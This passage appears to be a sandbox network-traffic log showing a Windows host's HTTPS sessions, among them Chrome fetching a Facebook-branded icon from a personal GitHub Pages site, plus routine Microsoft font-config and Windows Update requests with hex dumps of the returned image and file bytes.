fb 8b ed e2 99 85 37 80 19 54 69 e7 c6 e9 ba 6f fe 95 b2 ef dc 91 Data Ascii: 5"OfXnMoQuXP'dX&@Ti}<k7nhC!.)/C8Ee;kGP\U[8"`_,\V\|&W2:<\|_hyvo\M8c)?.f%~b{oD3Uynmm#peHQe'?:7Tio
2024-09-29 04:06:41 UTC	1378	IN	Data Raw: ec 72 9b 62 8b 90 c2 76 59 a0 f9 16 e5 9c a3 b5 a4 bc 6e ec 07 02 10 5d 76 b9 4d b1 45 48 59 f8 69 d5 e4 b2 6a b1 ed ab a2 81 48 50 23 c7 7d 29 f3 00 b0 09 3b dc a6 44 3d a4 f8 03 ca a4 cf 6a 0b b9 45 81 a7 a9 5b 94 a9 43 19 39 06 60 1f 76 b8 4d 89 7a 48 79 66 71 d9 ac 2f b6 d3 30 0b 6f e3 16 05 80 1d 2d 2e d2 27 96 6d ab 8a 5a a5 23 aa 21 85 5b 14 80 5b 14 00 f6 55 59 ab 65 2e af 29 1c b5 a3 ba 36 2a 83 2d 51 0d 29 8b 56 56 4d da b2 8b 5e 14 78 1b b7 28 00 ec ec b9 65 fa cc 0d 25 65 fd 8d c7 88 8a 5a 48 59 5d 5a 3b e4 bd 8a 01 13 18 3b 86 97 25 c5 8b 0c cb 11 e9 9a 64 1c 00 80 cd ac 2e d3 86 bc 57 39 60 42 34 6e 53 a2 16 52 d4 d8 31 13 3d f0 ba 91 79 22 43 b2 d9 2e 0b c0 de a2 75 9b 12 95 90 c2 0a 7c a0 d9 b9 23 d9 2e 0b c0 fe d4 6d 4a b9 0c c8 89 f4 38 Data Ascii: rbvYn]vMEHYijHP#});D=jE[C9`vMzHyfq/0o-.'mZ#![[UYe.)6*-Q)VVM^x(e%eZHY]Z;;%d.W9`B4nSR1=y"C.u\|#.mJ8
2024-09-29 04:06:41 UTC	1378	IN	Data Raw: e1 19 53 43 ca b2 f5 d5 a3 2b 98 ea 01 0e 60 89 9b 33 a9 f2 ce e5 7f e7 f6 04 68 af 65 25 ba 69 25 1f 53 43 ca 2a 75 93 42 a9 07 38 20 b7 9b 48 32 fd 28 8e a2 9a 63 7f f0 a8 c8 8b 2b e8 3d 01 da 6b 4d 99 0c d9 59 6d ce 28 b2 69 21 65 75 69 ed 90 b2 23 86 e7 ec db cf 24 03 a0 a8 17 b0 25 1a 2f 6a 83 fd 2d 5a 27 32 fb 31 91 85 fe cf 94 77 80 f6 f3 35 68 49 9f d5 0f 1f be c3 84 a0 62 5a 48 59 ba ae 7a 74 c5 6e b6 cc 02 01 6c 9a 75 8e a5 c5 22 bf 79 91 37 f9 02 66 59 5e 6c 4e c9 c7 c4 9b 94 1a 4a 3d 80 81 4d b3 ce 51 5a 25 72 fb 6b cd 2f fc 03 60 8e 65 c5 32 aa b2 aa 3a ec 1e 55 53 42 0a 2f 14 04 be 4d 8d 1f c7 10 50 6c 4f 35 c9 de f4 92 c8 bb 1b 28 f1 00 66 aa ac d5 32 37 49 61 6e b8 2f 1c 34 25 a4 30 7a 0c 7c 1b 93 3d ce f0 db 17 59 d0 06 58 65 99 09 25 1f Data Ascii: SC+`3he%i%SC*uB8 H2(c+=kMYm(i!eui#$%/j-Z'21w5hIbZHYztnlu"y7fY^lNJ=MQZ%rk/`e2:USB/MPlO5(f27Ian/4%0z\|=YXe%
2024-09-29 04:06:41 UTC	1378	IN	Data Raw: 3a 6c ae 08 2a a4 54 ee 6a c8 ac 6b a2 d4 03 00 00 cc b1 67 af 9a f0 f9 fa b0 13 3e 41 df a4 ec db 2f 6d 8e 0a 01 00 00 04 23 98 5d 29 c1 dd a4 54 37 64 d4 37 70 93 02 00 00 cc 11 cc ae 94 a0 cb 3d f5 4d 34 cd 02 00 00 73 54 d6 48 66 5d 1b cd b3 c1 85 94 dd 8d 19 75 8c 1f 03 00 00 93 54 ed d1 bb d5 37 1c 7e 0c 39 a8 90 b2 7d 57 43 06 ef ed 01 00 00 66 d9 d3 20 9d f6 ed 33 61 ba 67 4f 7d 53 a7 26 c6 8f 01 00 80 49 82 59 e8 16 54 48 a9 db bb 3f a9 e9 6b a6 7b 00 00 80 39 ea 0e 34 ce 9a b1 27 85 9e 14 00 00 60 a2 ca 5a 2d b3 ae be 31 bc c6 59 b5 23 e5 eb d4 11 94 7a 00 00 80 a9 f6 a6 8d 48 3a dc d6 d9 36 43 0a db 66 01 00 80 15 da da 3a 1b d4 4d 0a db 66 01 00 80 d9 2a da d8 95 12 54 4f 0a 00 00 80 d9 54 f3 6c 78 e5 1e 56 e2 03 00 00 0b b4 b5 1a bf cd 90 b2 Data Ascii: :lTjkg>A/m#])T7d7p=M4sTHf]uT7~9}WCf 3agO}S&IYTH?k{94'`Z-1Y#zH:6Cf:MfTOTlxV
2024-09-29 04:06:41 UTC	1378	IN	Data Raw: 30 86 0c 00 ee 46 a9 07 56 0b 76 fc 58 09 ed 26 a5 73 5c 65 62 9c b4 59 43 02 00 38 93 6a 9a a5 d4 03 2b e5 76 0d ae 69 56 09 b1 dc 13 5f 91 10 43 b9 07 00 dc 8a 75 f8 b0 5a 5e 37 51 e5 1e f3 43 ca e0 bc e4 55 5d 92 65 87 f1 08 00 70 19 76 a4 c0 6a 99 9d 83 9b ec 51 42 bd 49 a9 ec b8 7b 39 e5 1e 00 70 21 5f 83 c8 c6 0a 76 a4 c0 5a 39 fb 97 5b 53 ee 51 72 33 13 4a d8 3c 0b 00 ee c3 12 37 58 2d 94 c9 1e 25 e4 90 c2 84 0f 00 b8 93 da 8f 42 48 81 95 42 99 ec 51 da 75 93 92 1c 4f 48 01 00 b7 51 3b 52 e8 47 81 95 06 67 cb aa ae 69 29 41 f7 b6 86 1c 52 f2 bb 27 15 77 4e 94 a0 af 6a 00 00 ce c0 8e 14 58 2d d8 77 f6 04 84 5e ee c9 4a 2c ee cc 4d 0a 00 b8 0e eb f0 61 b5 3e 19 6a fc 38 c1 ba 90 92 d4 b1 83 2f 4b 5f 59 c6 52 37 00 70 0f d5 34 5b be 9b 75 f8 b0 4e 46 Data Ascii: 0FVvX&s\ebYC8j+viV_CuZ^7QCU]epvjQBI{9p!_vZ9[SQr3J<7X-%BHBQuOHQ;RGgi)AR'wNjX-w^J,Ma>j8/K_YR7p4[uNF
2024-09-29 04:06:41 UTC	1378	IN	Data Raw: 23 32 21 25 37 79 d5 b8 cc a2 c5 04 15 00 00 9c cf ca dd 28 2d 45 24 a4 28 ec 4c 01 00 c0 1d ac dc 8d d2 52 c4 42 0a 3b 53 00 00 70 be a4 78 dd 37 ae bf bc 97 d9 cd ba a9 9e 80 88 85 14 b5 33 65 72 ee e6 37 b3 53 65 8b 71 04 00 00 1c 66 54 be 7c d4 3b ae e4 cb d8 98 18 cb 2f 1d 22 16 52 94 51 05 69 4b 32 3b 8b 65 a3 4a 00 00 c0 5a 91 68 98 0d 88 68 48 a1 81 16 00 00 e7 8a 54 c3 6c 40 44 43 8a 72 c2 b0 f4 b7 7b a6 51 f2 01 00 c0 69 22 d5 30 1b 10 f1 90 32 6a 40 da 92 fc 74 fd 4b 1a 68 01 00 70 0e b5 61 f6 d4 ec 95 af f4 ec 9e 1e b1 8b 86 88 87 14 d5 40 7b fa 80 f2 17 d8 40 0b 00 80 73 8c cc 93 25 99 16 ae c0 6f 4d c4 43 8a 32 7d 4c d6 cb 79 5d 08 29 00 00 38 c5 b4 61 da fc bc 5e 59 11 fd 6f 77 54 42 8a ba 4d 19 93 b5 f1 bd cc 14 26 7d 00 00 b0 bb 89 05 fa Data Ascii: #2!%7y(-E$(LRB;Spx73er7SeqfT\|;/"RQiK2;eJZhhHTl@DCr{Qi"02j@tKhpa@{@s%oMC2}Ly])8a^YowTBM&}
2024-09-29 04:06:41 UTC	1378	IN	Data Raw: bf 9a d2 51 5c fb ff 48 00 80 77 a8 32 cf c5 03 57 3e d2 3f df 5d d3 3c 07 f3 44 48 51 ae 9f d9 ef f7 63 fb eb ef 30 96 0c 00 70 b2 c4 78 dd 77 fb 39 da b5 a3 87 17 7c 64 1c b9 96 67 42 4a 46 6a 7c e5 c5 c3 2b 1e ed 9b 21 1b 8d 23 00 00 1c e7 92 71 da c3 c7 e7 54 2d 72 db b8 71 6b 3c 13 52 94 e9 63 b2 5e fe c9 a8 4d f7 d0 9f 02 00 70 22 37 8f 1b b7 c6 53 21 45 61 2c 19 00 e0 44 6e 1f 37 6e 8d e7 42 8a 1a 4b be ed ac c6 6b 26 0c d0 df a6 3f 05 00 e0 04 81 3e 94 09 7d 1b 17 b8 75 dc b8 35 9e 0b 29 0a fd 29 00 00 27 39 6f a4 3c 3d a6 47 c5 fb 5e e8 43 69 c9 93 21 45 a1 3f 05 00 e0 04 aa 0f e5 f2 91 9b ef cd eb 95 e9 b9 ff 5e 79 36 a4 28 aa 3f e5 e4 41 fa 9b ec 4f 01 00 d8 91 ea 43 b9 7c d8 e7 f7 0e ea 9f b3 c6 38 f2 14 4f 87 14 d5 9f f2 eb a9 8d 37 b3 3f 05 Data Ascii: Q\Hw2W>?]<DHQc0pxw9\|dgBJFj\|+!#qT-rqk<Rc^Mp"7S!Ea,Dn7nBKk&?>}u5))'9o<=G^Ci!E?^y6(?AOC\|8O7?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49747	185.199.110.153	443	3020	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-29 04:06:42 UTC	376	OUT	GET /facebook-mobile/assets/icon.png HTTP/1.1 Host: omar-tnzxoo.github.io Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-29 04:06:42 UTC	740	IN	HTTP/1.1 200 OK Connection: close Content-Length: 16067 Server: GitHub.com Content-Type: image/png permissions-policy: interest-cohort=() x-origin-cache: HIT Last-Modified: Thu, 29 Aug 2024 09:10:54 GMT Access-Control-Allow-Origin: * Strict-Transport-Security: max-age=31556952 ETag: "66d03b1e-3ec3" expires: Sun, 29 Sep 2024 04:16:41 GMT Cache-Control: max-age=600 x-proxy-cache: MISS X-GitHub-Request-Id: 4FB1:1A1E62:27E9793:2CE7BC4:66F8D251 Accept-Ranges: bytes Date: Sun, 29 Sep 2024 04:06:42 GMT Via: 1.1 varnish Age: 1 X-Served-By: cache-ewr-kewr1740031-EWR X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1727582802.383961,VS0,VE1 Vary: Accept-Encoding X-Fastly-Request-ID: 7f2df616f4d025d734d5e6c33bfdcdac743aa793
2024-09-29 04:06:42 UTC	1378	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 29 00 00 02 2c 08 06 00 00 00 37 5e 39 ad 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 3e 58 49 44 41 54 78 5e ed dd 09 78 54 e5 bd c7 f1 ff 91 2c 24 21 21 81 90 04 02 21 09 8b 84 2d 88 b2 29 08 02 2e 08 b8 17 05 eb 52 91 da 5a 5b b5 d5 56 6b ad 4b 8b b6 2e ad 5a ad f6 ba db 56 ea 56 15 f7 16 01 77 16 45 91 2d 80 26 11 48 20 21 10 48 98 84 84 e0 b9 f3 92 33 35 62 20 33 99 73 66 ce f2 fd 3c 4f 9e e4 bc 41 1f 7b af c4 1f ef 7f 39 9a ae eb 02 00 00 60 37 47 18 9f 01 00 00 6c 85 90 02 00 00 6c 89 90 02 00 00 6c 89 90 02 00 00 6c 89 90 02 00 00 6c 89 90 02 00 00 6c 89 90 02 00 00 6c 89 90 02 00 Data Ascii: PNGIHDR),7^9sRGBgAMAapHYs%%IR$>XIDATx^xT,$!!!-).RZ[VkK.ZVVwE-&H !H35b 3sf<OA{9`7Glllllll
2024-09-29 04:06:42 UTC	1378	IN	Data Raw: c0 de 68 b2 45 b4 11 52 10 71 84 13 c0 79 54 93 ed d5 27 69 77 12 56 10 49 84 14 44 0c e1 04 70 3e c2 0a 22 89 90 02 cb 11 4e 00 f7 21 ac 20 12 08 29 b0 0c e1 04 70 b7 a4 78 dd 77 e6 70 79 fe 07 63 b5 47 68 b0 85 15 08 29 30 1d e1 04 f0 16 d5 60 fb bd 11 f2 cc 4f 8e ad bc 27 af 57 66 89 71 0c 84 8d 90 02 53 2d fc b4 6a d2 ad ff e9 7a eb 8a af b4 11 84 13 c0 5b d8 b3 02 b3 11 52 60 0a b5 21 f6 ae b7 3b 5d f7 c6 e7 da b4 9a bd 92 62 1c 03 f0 20 c2 0a cc 42 48 41 58 4a b6 d6 e5 df b3 28 e1 17 cf 7f ac 9d cb fa 7a 00 2d 8d cc d7 97 5c 3f 55 fb dd f8 be 8d 8b e8 57 41 7b 10 52 d0 2e aa ef e4 e9 65 1d 2e fc d3 5b 72 6d 69 95 e4 19 c7 00 f0 1d 4c 02 a1 bd 08 29 08 d9 2b 4b 2a 4e bb 63 51 c6 0d 2b 37 6b 47 d1 77 02 20 18 34 d7 a2 3d 08 29 08 1a 7d 27 00 c2 a5 c2 Data Ascii: hERqyT'iwVIDp>"N! )pxwpycGh)0`O'WfqS-jz[R`!;]b BHAXJ(z-\?UWA{R.e.[rmiL)+K*NcQ+7kGw 4=)}'
2024-09-29 04:06:42 UTC	1378	IN	Data Raw: ed c6 4d 03 8d 23 84 80 90 d2 4e cf 2c 2e 9b 79 ef 47 39 d7 94 56 49 9e 71 04 00 c0 77 a8 89 cf 3b de ed 75 c3 86 e2 b2 fe c6 11 82 44 48 69 07 15 50 e6 2e cc be 79 63 85 f0 2f 1c 00 a0 4d cf 2c d3 66 dd b6 a8 c7 4d 04 95 d0 10 52 42 f4 ca 92 8a d3 fe f8 4e f6 0d 04 14 00 40 28 54 50 79 e4 93 1e 3f da b2 b5 aa a7 71 84 36 10 52 42 b0 ba b4 76 c8 dd ef 64 5e b7 ae 5c 06 19 47 00 00 04 ed 2f 0b b4 ab 9f 5e 99 7e c1 8e ea da ae c6 11 0e 83 90 12 24 b5 4d f6 a6 d7 3a cd 5d f1 95 1c 63 1c 01 00 10 b2 3b 5e d7 6f f8 f7 aa e4 19 35 7b ea 98 0a 6d 03 21 25 08 81 75 f7 8b 8b b4 49 fb f6 0b 8b 79 00 00 ed e6 6b d0 92 7e 3f 5f bf e9 8d 75 89 53 59 9f 7f 78 9a ae eb c6 97 68 8d da 26 7b e5 bf 8e 78 f0 c5 4f b4 b3 59 77 0f 00 30 4b 46 b2 5e f1 d0 c5 da 9c c9 03 9a de Data Ascii: M#N,.yG9VIqw;uDHiP.yc/M,fMRBN@(TPy?q6RBvd^\G/^~$M:]c;^o5{m!%uIyk~?_uSYxh&{xOYw0KF^
2024-09-29 04:06:42 UTC	1378	IN	Data Raw: 35 22 4f ce d6 92 66 8c 90 58 6e 4d 00 eb f9 1a b4 a4 df cf d7 6f fe f8 f3 8d ae df 92 ee 89 90 a2 de cb f3 51 75 e1 58 fa 50 80 f0 b5 0c 27 aa d7 64 58 0e b7 26 40 a4 95 54 69 f9 f7 7d 3c f0 17 6b 37 6e 1a 68 1c b9 92 eb 43 ca ea d2 da 21 0f 2e cd fe 29 2f 0e 04 c2 43 38 01 ec 45 f5 a7 bc fa 65 ce e9 3b aa 6b bb 1a 47 ae e3 ea 90 a2 fa 50 ee 5c d0 e9 fa 55 5b a4 d0 38 02 10 22 c2 09 60 5f 0f 2c d0 af 5c 56 96 7c ec be a6 26 57 b6 32 b8 3a a4 3c b3 b8 7c d6 87 5f 68 94 79 80 76 9a e6 8f f7 6f 5c 4d 38 01 ec ca ed 63 c9 ae 0d 29 0b 3f ad 9a f4 8f cf f3 2e 66 dc 18 08 9d 1a 25 7e 62 b6 ee 7b e4 07 b2 6f 44 1e e1 04 b0 33 55 f6 79 6e 6d ce ac 6d db ab b3 8c 23 d7 70 65 48 51 65 9e 27 3f e9 3a fb 8b ed e2 99 85 37 80 19 54 69 e7 c6 e9 ba 6f fe 95 b2 ef dc 91 Data Ascii: 5"OfXnMoQuXP'dX&@Ti}<k7nhC!.)/C8Ee;kGP\U[8"`_,\V\|&W2:<\|_hyvo\M8c)?.f%~b{oD3Uynmm#peHQe'?:7Tio
2024-09-29 04:06:42 UTC	1378	IN	Data Raw: ec 72 9b 62 8b 90 c2 76 59 a0 f9 16 e5 9c a3 b5 a4 bc 6e ec 07 02 10 5d 76 b9 4d b1 45 48 59 f8 69 d5 e4 b2 6a b1 ed ab a2 81 48 50 23 c7 7d 29 f3 00 b0 09 3b dc a6 44 3d a4 f8 03 ca a4 cf 6a 0b b9 45 81 a7 a9 5b 94 a9 43 19 39 06 60 1f 76 b8 4d 89 7a 48 79 66 71 d9 ac 2f b6 d3 30 0b 6f e3 16 05 80 1d 2d 2e d2 27 96 6d ab 8a 5a a5 23 aa 21 85 5b 14 80 5b 14 00 f6 55 59 ab 65 2e af 29 1c b5 a3 ba 36 2a 83 2d 51 0d 29 8b 56 56 4d da b2 8b 5e 14 78 1b b7 28 00 ec ec b9 65 fa cc 0d 25 65 fd 8d c7 88 8a 5a 48 59 5d 5a 3b e4 bd 8a 01 13 18 3b 86 97 25 c5 8b 0c cb 11 e9 9a 64 1c 00 80 cd ac 2e d3 86 bc 57 39 60 42 34 6e 53 a2 16 52 d4 d8 31 13 3d f0 ba 91 79 22 43 b2 d9 2e 0b c0 de a2 75 9b 12 95 90 c2 0a 7c a0 d9 b9 23 d9 2e 0b c0 fe d4 6d 4a b9 0c c8 89 f4 38 Data Ascii: rbvYn]vMEHYijHP#});D=jE[C9`vMzHyfq/0o-.'mZ#![[UYe.)6*-Q)VVM^x(e%eZHY]Z;;%d.W9`B4nSR1=y"C.u\|#.mJ8
2024-09-29 04:06:42 UTC	1378	IN	Data Raw: e1 19 53 43 ca b2 f5 d5 a3 2b 98 ea 01 0e 60 89 9b 33 a9 f2 ce e5 7f e7 f6 04 68 af 65 25 ba 69 25 1f 53 43 ca 2a 75 93 42 a9 07 38 20 b7 9b 48 32 fd 28 8e a2 9a 63 7f f0 a8 c8 8b 2b e8 3d 01 da 6b 4d 99 0c d9 59 6d ce 28 b2 69 21 65 75 69 ed 90 b2 23 86 e7 ec db cf 24 03 a0 a8 17 b0 25 1a 2f 6a 83 fd 2d 5a 27 32 fb 31 91 85 fe cf 94 77 80 f6 f3 35 68 49 9f d5 0f 1f be c3 84 a0 62 5a 48 59 ba ae 7a 74 c5 6e b6 cc 02 01 6c 9a 75 8e a5 c5 22 bf 79 91 37 f9 02 66 59 5e 6c 4e c9 c7 c4 9b 94 1a 4a 3d 80 81 4d b3 ce 51 5a 25 72 fb 6b cd 2f fc 03 60 8e 65 c5 32 aa b2 aa 3a ec 1e 55 53 42 0a 2f 14 04 be 4d 8d 1f c7 10 50 6c 4f 35 c9 de f4 92 c8 bb 1b 28 f1 00 66 aa ac d5 32 37 49 61 6e b8 2f 1c 34 25 a4 30 7a 0c 7c 1b 93 3d ce f0 db 17 59 d0 06 58 65 99 09 25 1f Data Ascii: SC+`3he%i%SC*uB8 H2(c+=kMYm(i!eui#$%/j-Z'21w5hIbZHYztnlu"y7fY^lNJ=MQZ%rk/`e2:USB/MPlO5(f27Ian/4%0z\|=YXe%
2024-09-29 04:06:42 UTC	1378	IN	Data Raw: 3a 6c ae 08 2a a4 54 ee 6a c8 ac 6b a2 d4 03 00 00 cc b1 67 af 9a f0 f9 fa b0 13 3e 41 df a4 ec db 2f 6d 8e 0a 01 00 00 04 23 98 5d 29 c1 dd a4 54 37 64 d4 37 70 93 02 00 00 cc 11 cc ae 94 a0 cb 3d f5 4d 34 cd 02 00 00 73 54 d6 48 66 5d 1b cd b3 c1 85 94 dd 8d 19 75 8c 1f 03 00 00 93 54 ed d1 bb d5 37 1c 7e 0c 39 a8 90 b2 7d 57 43 06 ef ed 01 00 00 66 d9 d3 20 9d f6 ed 33 61 ba 67 4f 7d 53 a7 26 c6 8f 01 00 80 49 82 59 e8 16 54 48 a9 db bb 3f a9 e9 6b a6 7b 00 00 80 39 ea 0e 34 ce 9a b1 27 85 9e 14 00 00 60 a2 ca 5a 2d b3 ae be 31 bc c6 59 b5 23 e5 eb d4 11 94 7a 00 00 80 a9 f6 a6 8d 48 3a dc d6 d9 36 43 0a db 66 01 00 80 15 da da 3a 1b d4 4d 0a db 66 01 00 80 d9 2a da d8 95 12 54 4f 0a 00 00 80 d9 54 f3 6c 78 e5 1e 56 e2 03 00 00 0b b4 b5 1a bf cd 90 b2 Data Ascii: :lTjkg>A/m#])T7d7p=M4sTHf]uT7~9}WCf 3agO}S&IYTH?k{94'`Z-1Y#zH:6Cf:MfTOTlxV
2024-09-29 04:06:42 UTC	1378	IN	Data Raw: 30 86 0c 00 ee 46 a9 07 56 0b 76 fc 58 09 ed 26 a5 73 5c 65 62 9c b4 59 43 02 00 38 93 6a 9a a5 d4 03 2b e5 76 0d ae 69 56 09 b1 dc 13 5f 91 10 43 b9 07 00 dc 8a 75 f8 b0 5a 5e 37 51 e5 1e f3 43 ca e0 bc e4 55 5d 92 65 87 f1 08 00 70 19 76 a4 c0 6a 99 9d 83 9b ec 51 42 bd 49 a9 ec b8 7b 39 e5 1e 00 70 21 5f 83 c8 c6 0a 76 a4 c0 5a 39 fb 97 5b 53 ee 51 72 33 13 4a d8 3c 0b 00 ee c3 12 37 58 2d 94 c9 1e 25 e4 90 c2 84 0f 00 b8 93 da 8f 42 48 81 95 42 99 ec 51 da 75 93 92 1c 4f 48 01 00 b7 51 3b 52 e8 47 81 95 06 67 cb aa ae 69 29 41 f7 b6 86 1c 52 f2 bb 27 15 77 4e 94 a0 af 6a 00 00 ce c0 8e 14 58 2d d8 77 f6 04 84 5e ee c9 4a 2c ee cc 4d 0a 00 b8 0e eb f0 61 b5 3e 19 6a fc 38 c1 ba 90 92 d4 b1 83 2f 4b 5f 59 c6 52 37 00 70 0f d5 34 5b be 9b 75 f8 b0 4e 46 Data Ascii: 0FVvX&s\ebYC8j+viV_CuZ^7QCU]epvjQBI{9p!_vZ9[SQr3J<7X-%BHBQuOHQ;RGgi)AR'wNjX-w^J,Ma>j8/K_YR7p4[uNF
2024-09-29 04:06:42 UTC	1378	IN	Data Raw: 23 32 21 25 37 79 d5 b8 cc a2 c5 04 15 00 00 9c cf ca dd 28 2d 45 24 a4 28 ec 4c 01 00 c0 1d ac dc 8d d2 52 c4 42 0a 3b 53 00 00 70 be a4 78 dd 37 ae bf bc 97 d9 cd ba a9 9e 80 88 85 14 b5 33 65 72 ee e6 37 b3 53 65 8b 71 04 00 00 1c 66 54 be 7c d4 3b ae e4 cb d8 98 18 cb 2f 1d 22 16 52 94 51 05 69 4b 32 3b 8b 65 a3 4a 00 00 c0 5a 91 68 98 0d 88 68 48 a1 81 16 00 00 e7 8a 54 c3 6c 40 44 43 8a 72 c2 b0 f4 b7 7b a6 51 f2 01 00 c0 69 22 d5 30 1b 10 f1 90 32 6a 40 da 92 fc 74 fd 4b 1a 68 01 00 70 0e b5 61 f6 d4 ec 95 af f4 ec 9e 1e b1 8b 86 88 87 14 d5 40 7b fa 80 f2 17 d8 40 0b 00 80 73 8c cc 93 25 99 16 ae c0 6f 4d c4 43 8a 32 7d 4c d6 cb 79 5d 08 29 00 00 38 c5 b4 61 da fc bc 5e 59 11 fd 6f 77 54 42 8a ba 4d 19 93 b5 f1 bd cc 14 26 7d 00 00 b0 bb 89 05 fa Data Ascii: #2!%7y(-E$(LRB;Spx73er7SeqfT\|;/"RQiK2;eJZhhHTl@DCr{Qi"02j@tKhpa@{@s%oMC2}Ly])8a^YowTBM&}
2024-09-29 04:06:42 UTC	1378	IN	Data Raw: bf 9a d2 51 5c fb ff 48 00 80 77 a8 32 cf c5 03 57 3e d2 3f df 5d d3 3c 07 f3 44 48 51 ae 9f d9 ef f7 63 fb eb ef 30 96 0c 00 70 b2 c4 78 dd 77 fb 39 da b5 a3 87 17 7c 64 1c b9 96 67 42 4a 46 6a 7c e5 c5 c3 2b 1e ed 9b 21 1b 8d 23 00 00 1c e7 92 71 da c3 c7 e7 54 2d 72 db b8 71 6b 3c 13 52 94 e9 63 b2 5e fe c9 a8 4d f7 d0 9f 02 00 70 22 37 8f 1b b7 c6 53 21 45 61 2c 19 00 e0 44 6e 1f 37 6e 8d e7 42 8a 1a 4b be ed ac c6 6b 26 0c d0 df a6 3f 05 00 e0 04 81 3e 94 09 7d 1b 17 b8 75 dc b8 35 9e 0b 29 0a fd 29 00 00 27 39 6f a4 3c 3d a6 47 c5 fb 5e e8 43 69 c9 93 21 45 a1 3f 05 00 e0 04 aa 0f e5 f2 91 9b ef cd eb 95 e9 b9 ff 5e 79 36 a4 28 aa 3f e5 e4 41 fa 9b ec 4f 01 00 d8 91 ea 43 b9 7c d8 e7 f7 0e ea 9f b3 c6 38 f2 14 4f 87 14 d5 9f f2 eb a9 8d 37 b3 3f 05 Data Ascii: Q\Hw2W>?]<DHQc0pxw9\|dgBJFj\|+!#qT-rqk<Rc^Mp"7S!Ea,Dn7nBKk&?>}u5))'9o<=G^Ci!E?^y6(?AOC\|8O7?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49748	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-09-29 04:06:42 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-09-29 04:06:42 UTC	515	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=131930 Date: Sun, 29 Sep 2024 04:06:42 GMT Content-Length: 55 Connection: close X-CID: 2
2024-09-29 04:06:42 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49749	52.165.165.26	443

Timestamp	Bytes transferred	Direction	Data
2024-09-29 04:06:47 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ggFwwBvAHA5o5lp&MD=GG7MMAKl HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-09-29 04:06:47 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 3fd43c2c-f94b-4a1e-b9d4-ab8d4c1fb945 MS-RequestId: 64d6b0c8-3c8d-4e23-a7bd-ff88cab1abe2 MS-CV: P00lou35REqUG7yW.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sun, 29 Sep 2024 04:06:47 GMT Connection: close Content-Length: 24490
2024-09-29 04:06:47 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
